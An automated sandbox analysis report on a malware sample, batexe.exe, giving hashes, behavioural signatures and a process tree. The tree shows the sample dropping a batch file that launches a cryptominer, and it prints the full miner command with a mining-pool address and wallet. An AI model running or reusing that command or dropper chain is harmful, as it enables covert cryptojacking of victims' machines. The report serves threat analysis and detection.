Analysis
-
max time kernel
294s -
max time network
298s -
platform
windows10-2004_x64 -
resource
win10v2004-20240221-ja -
resource tags
arch:x64arch:x86image:win10v2004-20240221-jalocale:ja-jpos:windows10-2004-x64systemwindows -
submitted
24-02-2024 02:55
Behavioral task
behavioral1
Sample
batexe.exe
Resource
win10-20240221-ja
Behavioral task
behavioral2
Sample
batexe.exe
Resource
win10v2004-20240221-ja
General
-
Target
batexe.exe
-
Size
9.4MB
-
MD5
cdc9eacffc6d2bf43153815043064427
-
SHA1
d05101f265f6ea87e18793ab0071f5c99edf363f
-
SHA256
73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
-
SHA512
fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
-
SSDEEP
196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3316742141-2240921845-2885234760-1000\Control Panel\International\Geo\Nation batexe.exe Key value queried \REGISTRY\USER\S-1-5-21-3316742141-2240921845-2885234760-1000\Control Panel\International\Geo\Nation b2e.exe -
Executes dropped EXE 2 IoCs
pid Process 4308 b2e.exe 736 cpuminer-sse2.exe -
Loads dropped DLL 5 IoCs
pid Process 736 cpuminer-sse2.exe 736 cpuminer-sse2.exe 736 cpuminer-sse2.exe 736 cpuminer-sse2.exe 736 cpuminer-sse2.exe -
resource yara_rule behavioral2/memory/3464-8-0x0000000000400000-0x000000000393A000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 3464 wrote to memory of 4308 3464 batexe.exe 91 PID 3464 wrote to memory of 4308 3464 batexe.exe 91 PID 3464 wrote to memory of 4308 3464 batexe.exe 91 PID 4308 wrote to memory of 1048 4308 b2e.exe 92 PID 4308 wrote to memory of 1048 4308 b2e.exe 92 PID 4308 wrote to memory of 1048 4308 b2e.exe 92 PID 1048 wrote to memory of 736 1048 cmd.exe 95 PID 1048 wrote to memory of 736 1048 cmd.exe 95
Processes
-
C:\Users\Admin\AppData\Local\Temp\batexe.exe"C:\Users\Admin\AppData\Local\Temp\batexe.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3464 -
C:\Users\Admin\AppData\Local\Temp\8925.tmp\b2e.exe"C:\Users\Admin\AppData\Local\Temp\8925.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\8925.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4308 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\8E55.tmp\batchfile.bat" "3⤵
- Suspicious use of WriteProcessMemory
PID:1048 -
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.execpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 34⤵
- Executes dropped EXE
- Loads dropped DLL
PID:736
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
14.4MB
MD5e76b75650a915f81673e40740f4f7627
SHA1ae5942541088f5890d2291aee879a6036ec18ceb
SHA256079ddaab12fedaca776a024eb58bb5f2b9ee4895aeaf0da6f55408910e074ce5
SHA5122499e01b3c7e59ae06767091167b0f74e366377bf9d11ed758687f9f757e61369ac9319c5c3a9971c1b5601e3b51e3c26a02a394aca06b7d853a832858a65cea
-
Filesize
960KB
MD5d15ecf39e70d4d6e278b0da9ff36ba87
SHA12139694bf96cc3b6fbfadb8a9c8745b8901bff6a
SHA25604b2e6191d36dccb7b93c7d207ff16c0702cdec9b64b98206f9ffc7dc7633d54
SHA512326cdd9b35aa3dbd39d2fd4a22dd78f732d481f05ef6dca085cd086d8ca91502f3be961b44e5c4bbf2ebf947ffc4f1b4d4703593951fce22acaa418a77741434
-
Filesize
109KB
MD56cae34cf100dfe375dfc2a645316c610
SHA1d9eb0da14b85f5cc5a5c2a75ac200ec1b4c111c8
SHA25651d7f360fc743ee014b14495b6eb9b01abb93e2521ad4aaa68301702fe1d0403
SHA512e194e44288f8a675d34b730e89c844ca81d05d769405356ba400b499f558e0632160f57080020c8d53ede166bb715282d4dbf0ae4a9f9e7ac32bd636cd40c31d
-
Filesize
136B
MD58ea7ac72a10251ecfb42ef4a88bd330a
SHA1c30f6af73a42c0cc89bd20fe95f9159d6f0756c5
SHA25665e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9
SHA512a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0
-
Filesize
1.5MB
MD5c400a934c679b720d5a9a8d8439aad7f
SHA14d65ab6a93dcab72b884b1bc1ee5db6f004727a8
SHA256897e8303f402465e0f78bf9fd4026bb9e6cc7cffcaec3f06f12ca54ff6572000
SHA51297fefeb6796452b7edef13ca57564333a4fc1035ff2e560a807b5160aaf02763694107f73d7922c6be344d7e649e403bad6965b11d4c14f3296a69c37063e3f6
-
Filesize
1.7MB
MD598bc7511cc01c86e34ec8623a8f6211b
SHA1cf276b95bc82319da8176ae1b5a086ee19f2a693
SHA2562cac567e6b0d7d54da3046e56b64c3f4ab5a71d88979fbedc985f88f0b947e2a
SHA512707950d3c6db8420f65f197640697f55e0e99e9964c3f8feb968f37f3985216ca607d69b2d339d9e7d70046fa649ac176244e61af47ab469574f4de9ffcde08f
-
Filesize
836KB
MD5aeab40ed9a8e627ea7cefc1f5cf9bf7a
SHA15e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8
SHA256218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9
SHA512c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8
-
Filesize
1.2MB
MD57cf672bee2afba2dcd0c031ff985958e
SHA16b82a205db080ffdcb4a4470fce85a14413f3217
SHA256c82f84171b9246d1cac261100b2199789c96c37b03b375f33b2c72afab060b05
SHA5123e90d1c1efe0200cb3cc7b51d04783a3cce8391faa6ce554cff8b23dac60be9f8e4f980a8ac005fd9dff8ea4bdcb02311f7649c5be28eb32dcc26417fc4090e5
-
Filesize
1.6MB
MD5d2ac266fcf2b4ccc571dd2935984346a
SHA11fc0a9de9729d88e9cfe6554a9437f6772d15818
SHA2564736cf8c993c4054c69323569328599379ad0ec54c2b394f7d5b46edbf833b76
SHA51250433762ea6d158cf4dc4cc9e0ab4c9c3b4a8c6fccd6efb837140df981ef7e3c7bed09eed85e3c4dd1a5ab83c70c64f4d431dbee31700cc24d42a0529ebf36e3
-
Filesize
1.3MB
MD57bad772d031dd6cc89bd72e95617ae6f
SHA1c776c20d455c9c5ed173316a8327904aedec1735
SHA25657a828bb2d54ef20c03c41ec7cbb5847915a16a33b446db0c2714a34cdde4e92
SHA512762f1fdc2704c8d6c36fe01341291f23edf6e1c464dfbc7ba2f3b157eb1a1258b9619a71b09250753b36cc573f94507a2097038f0efec5586d64228189aa18c8
-
Filesize
1.1MB
MD51bd2df31944752847dcacac0c82a7139
SHA17eef1646d204f74efb05b12a7a9392ec7cbd111d
SHA256c75ca6f75c648537b6bad0ccad832a554db722a5254312f4d15875dec262fc98
SHA5121b320f8afe1489dcbeb47cb0cb3c3e15cc483a18a70e674c1fd50250dfd7c66a4ea4baf1d973610d30b5baa2097df7b110e336689eb63e67541b73cbd37eeb06
-
Filesize
606KB
MD5585efec1bc1d4d916a4402c9875dff75
SHA1d209613666ccac9d0ddab29a3bc59aa00a0968fa
SHA2562f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232
SHA512b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770